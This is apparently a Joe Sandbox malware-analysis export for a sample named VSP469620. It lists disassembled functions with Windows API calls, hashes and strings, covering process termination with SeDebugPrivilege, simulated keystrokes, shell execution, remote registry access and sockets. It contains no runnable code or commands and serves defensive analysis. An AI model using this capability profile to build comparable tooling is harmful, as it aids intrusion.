                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 8617e7b6a5cdcf3eb2717293fead4a5ae9207a239dc36627d516072e91afcde2
                                                              • Instruction ID: fe65cb2ca5f70aff30c660230960852c912612f61a7d410351caafedc4b5bd76
                                                              • Opcode Fuzzy Hash: 8617e7b6a5cdcf3eb2717293fead4a5ae9207a239dc36627d516072e91afcde2
                                                              • Instruction Fuzzy Hash: 45E1C171A00219ABDF10DFA4D981BAE7FF5EF48354F1482A9F905AB2C1D770AD41CB90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2862541840-625585964
                                                              • Opcode ID: 4f1a449c1207b8d68f70a31e15e0a586090cdd5a7dd23c681bfb0accadebc990
                                                              • Instruction ID: aec7d7951a4477bda02b90f5d1571ab6aa9270fb2bd8525c77d3346847b20601
                                                              • Opcode Fuzzy Hash: 4f1a449c1207b8d68f70a31e15e0a586090cdd5a7dd23c681bfb0accadebc990
                                                              • Instruction Fuzzy Hash: CF918271A00219ABDF24CF95D884FAEBBF8EF45710F1085A9F515AB290DB709944CFA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B19B19
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B19B2D
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B19B47
                                                              • _wcscat.LIBCMT ref: 00B19BA2
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B19BB9
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B19BE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: 9a8450fd50b99323e78dc872f7161aba4fc6e4360417e61f511db1a59a75133c
                                                              • Instruction ID: 338a006bdeb56f5d35b35d8b55965ed5b732d24d194e40ea51f185c3cb5e3dea
                                                              • Opcode Fuzzy Hash: 9a8450fd50b99323e78dc872f7161aba4fc6e4360417e61f511db1a59a75133c
                                                              • Instruction Fuzzy Hash: 5741B171900348EBEB219FA4DC85FEE77E8EF08350F5048AAF599A7291C7719D84CB60
                                                              APIs
                                                                • Part of subcall function 00AF6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AF6554
                                                                • Part of subcall function 00AF6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AF6564
                                                                • Part of subcall function 00AF6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AF65F9
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1179A
                                                              • GetLastError.KERNEL32 ref: 00B117AD
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B117D9
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B11855
                                                              • GetLastError.KERNEL32(00000000), ref: 00B11860
                                                              • CloseHandle.KERNEL32(00000000), ref: 00B11895
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: 953c4a8de9d730ba7846be57659be636efabe1ac4d1565379698fd11b098aa54
                                                              • Instruction ID: 065c7c010fac60c6108931cde655f16d522e44e289716a6c501ce773df8dccef
                                                              • Opcode Fuzzy Hash: 953c4a8de9d730ba7846be57659be636efabe1ac4d1565379698fd11b098aa54
                                                              • Instruction Fuzzy Hash: BF41CD71600204AFDB05EF98CA95FBEB7E5AF44310F05C499FA069F2D2DF74A9408B51
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00AF58B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 2c2e450301488c776f2cfabe9391e5b242de531eda150320481247ff74cdf023
                                                              • Instruction ID: 1916e1786764c8480f479fedba1178034dfe28a1872b3fcbdd5fee78e0e316ef
                                                              • Opcode Fuzzy Hash: 2c2e450301488c776f2cfabe9391e5b242de531eda150320481247ff74cdf023
                                                              • Instruction Fuzzy Hash: D411EE31A0D74ABAE7055BA4DC82D7A37DC9F15764F30003AF742A6281E7749A0056A4
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00AFA806
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 4ba80db6255df46810335f02d5286969ff0942eecd4de66ecc2bb8cbee24a160
                                                              • Instruction ID: ad80bd8e905dc79bcdc91f339314f3e27848902a0b373fedb02a9b8b0cf4cfb9
                                                              • Opcode Fuzzy Hash: 4ba80db6255df46810335f02d5286969ff0942eecd4de66ecc2bb8cbee24a160
                                                              • Instruction Fuzzy Hash: B9C177B5A0020A9FDB04DF98D581BFEB7F4EF18351F20806AF61AE7241D774AA45CB91
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AF6B63
                                                              • LoadStringW.USER32(00000000), ref: 00AF6B6A
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AF6B80
                                                              • LoadStringW.USER32(00000000), ref: 00AF6B87
                                                              • _wprintf.LIBCMT ref: 00AF6BAD
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF6BCB
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00AF6BA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: 0be72637bca6afa53b0336cff1ca6f28cd865499695be313a67f4b6ca5a19f71
                                                              • Instruction ID: c50f0ab69ca72634a5cf26289fbd938ab81099f05ec75cd92a6d109c32b21f17
                                                              • Opcode Fuzzy Hash: 0be72637bca6afa53b0336cff1ca6f28cd865499695be313a67f4b6ca5a19f71
                                                              • Instruction Fuzzy Hash: 3A0112F69002187FE711A7D4AD89EFA776CEB04304F104495B746E7151EA749E848B74
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B12BF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 2595220575-0
                                                              • Opcode ID: 2c6f0a9c4cfd5ce8aff4f89bebffe00ab26b8561301f2706e8ccd966b19bdd15
                                                              • Instruction ID: f7882db76d7d59ce91a5660e5b749c445539aa4560553fb6408a9b7f6a892886
                                                              • Opcode Fuzzy Hash: 2c6f0a9c4cfd5ce8aff4f89bebffe00ab26b8561301f2706e8ccd966b19bdd15
                                                              • Instruction Fuzzy Hash: 81919A712042009FCB14EF54D991FAEB7E5FF88310F54886DF9969B2A2DB30E995CB42
                                                              APIs
                                                              • select.WSOCK32 ref: 00B09691
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B0969E
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00B096C8
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B096E9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B096F8
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00B097AA
                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00B4DC00), ref: 00B09765
                                                                • Part of subcall function 00AED2FF: _strlen.LIBCMT ref: 00AED309
                                                              • _strlen.LIBCMT ref: 00B09800
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                              • String ID:
                                                              • API String ID: 3480843537-0
                                                              • Opcode ID: e34f0e12323cc434e10a6ae0abf405487a9ce728f5d814d40afeba976270dc8a
                                                              • Instruction ID: b6cb8afcda185944a4e3635673bee1b569dd33bfbd2416958bed13f81873b83c
                                                              • Opcode Fuzzy Hash: e34f0e12323cc434e10a6ae0abf405487a9ce728f5d814d40afeba976270dc8a
                                                              • Instruction Fuzzy Hash: EC81BA31504240ABC714EF64CE85EABBBE8EF89710F108A5DF5559B2A2EB30DD04CB92
                                                              APIs
                                                              • __mtinitlocknum.LIBCMT ref: 00ADA991
                                                                • Part of subcall function 00AD7D7C: __FF_MSGBANNER.LIBCMT ref: 00AD7D91
                                                                • Part of subcall function 00AD7D7C: __NMSG_WRITE.LIBCMT ref: 00AD7D98
                                                                • Part of subcall function 00AD7D7C: __malloc_crt.LIBCMT ref: 00AD7DB8
                                                              • __lock.LIBCMT ref: 00ADA9A4
                                                              • __lock.LIBCMT ref: 00ADA9F0
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B66DE0,00000018,00AE5E7B,?,00000000,00000109), ref: 00ADAA0C
                                                              • EnterCriticalSection.KERNEL32(8000000C,00B66DE0,00000018,00AE5E7B,?,00000000,00000109), ref: 00ADAA29
                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 00ADAA39
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1422805418-0
                                                              • Opcode ID: 2a559d59c334c59d2d63001ff5a77e7b694f3eccb2d6bc1ff409c8f286be4407
                                                              • Instruction ID: bc2d1ad58578fd67dd2bfbf70cbf1a99d70786700cc7cd92933cd0595351ceea
                                                              • Opcode Fuzzy Hash: 2a559d59c334c59d2d63001ff5a77e7b694f3eccb2d6bc1ff409c8f286be4407
                                                              • Instruction Fuzzy Hash: CC414771A012019BEB149F68DA4479DB7B0AF21374F20831BE52BAB3E1DB749D40CB82
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00B18EE4
                                                              • GetDC.USER32(00000000), ref: 00B18EEC
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B18EF7
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00B18F03
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00B18F3F
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B18F50
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B1BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00B18F8A
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B18FAA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: 664c8fde8dfe0a313c81e5f4cab0bfd74f7562793f777d6e62caa7a329386b16
                                                              • Instruction ID: 8c7111f2c2fd601f7a74d833fc92c1ab3e29dffe70d38d2adbaafd54f90bf82d
                                                              • Opcode Fuzzy Hash: 664c8fde8dfe0a313c81e5f4cab0bfd74f7562793f777d6e62caa7a329386b16
                                                              • Instruction Fuzzy Hash: 80316B72200614BFEB108F50DC8AFEA3BA9FF49715F044065FE08DB191CAB59842CBB0
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                              • _wcstok.LIBCMT ref: 00B0184E
                                                              • _wcscpy.LIBCMT ref: 00B018DD
                                                              • _memset.LIBCMT ref: 00B01910
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X
                                                              • API String ID: 774024439-3081909835
                                                              • Opcode ID: b0b347eec7191ad30f95e3e2f34089d06375d605bcbbc85232a33561f5798e62
                                                              • Instruction ID: daa16d179ee89a0e64adf75c1d6be956ec9b5fff59e67cb7b9754583b0a7f6ae
                                                              • Opcode Fuzzy Hash: b0b347eec7191ad30f95e3e2f34089d06375d605bcbbc85232a33561f5798e62
                                                              • Instruction Fuzzy Hash: BFC163316043409FC718EF68CA91A9EBBE4FF85354F04496DF59A972A2DB30ED45CB82
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00B2016D
                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00B2038D
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B203AB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00B203D6
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B203FF
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00B20421
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B20440
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                              • String ID:
                                                              • API String ID: 3356174886-0
                                                              • Opcode ID: 816dc7f7d0df1569084783d0dfb956b3f51f13347793a9c57dc6bbc52a148a56
                                                              • Instruction ID: 884c7fd44c3efa42f4d73a7d3df0ea820a731a7b8c76495504c8cf13cdc0edb3
                                                              • Opcode Fuzzy Hash: 816dc7f7d0df1569084783d0dfb956b3f51f13347793a9c57dc6bbc52a148a56
                                                              • Instruction Fuzzy Hash: 7EA1DD30600626EFDB18DF28D9897BDBBF1FF08700F148195E858AB295DB34AD60CB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90cd188aa2dcec83387586ebab3a4a1e8b8fd250243dedc37461c811bcb3edc2
                                                              • Instruction ID: 821117f5e621e7943be2ba8ca6c25f28411fe036d8d9c3f9bbf5a7b6aff27d01
                                                              • Opcode Fuzzy Hash: 90cd188aa2dcec83387586ebab3a4a1e8b8fd250243dedc37461c811bcb3edc2
                                                              • Instruction Fuzzy Hash: 667147B1900109AFCB14CF98CC89EBEBBB8FF85314F25814DF915AA251C730AA51CBA5
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B1225A
                                                              • _memset.LIBCMT ref: 00B12323
                                                              • ShellExecuteExW.SHELL32(?), ref: 00B12368
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                              • CloseHandle.KERNEL32(00000000), ref: 00B1242F
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00B1243E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 4082843840-2766056989
                                                              • Opcode ID: 340dcb863632ff74ead700f766fb86845808a778ae58fcbe57d6ab510f270acb
                                                              • Instruction ID: 601b7dbb7655df2222d6ef9ac6ca0c1dd39835e94ba93d6617529dbdd294bd95
                                                              • Opcode Fuzzy Hash: 340dcb863632ff74ead700f766fb86845808a778ae58fcbe57d6ab510f270acb
                                                              • Instruction Fuzzy Hash: CD716D74A006199FCF04EFA4D981AEEBBF5FF48310F108499E956AB351DB34AD50CB94
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00AF3DE7
                                                              • GetKeyboardState.USER32(?), ref: 00AF3DFC
                                                              • SetKeyboardState.USER32(?), ref: 00AF3E5D
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AF3E8B
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AF3EAA
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AF3EF0
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AF3F13
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: a9201fccd7f9cb7234eac649a4fab26d0999597a959db8ff600b5b1ea41e3923
                                                              • Instruction ID: 86ab9e39b13b2f083623bbbe6513e049e0fba33df7eeb36e8c70b95c03baef5f
                                                              • Opcode Fuzzy Hash: a9201fccd7f9cb7234eac649a4fab26d0999597a959db8ff600b5b1ea41e3923
                                                              • Instruction Fuzzy Hash: D951C3A1A047D93DFF3643A4CC45BBA7EE95F06304F088589F2D54A8C2D7949EC8D760
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00AF3C02
                                                              • GetKeyboardState.USER32(?), ref: 00AF3C17
                                                              • SetKeyboardState.USER32(?), ref: 00AF3C78
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AF3CA4
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AF3CC1
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AF3D05
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AF3D26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
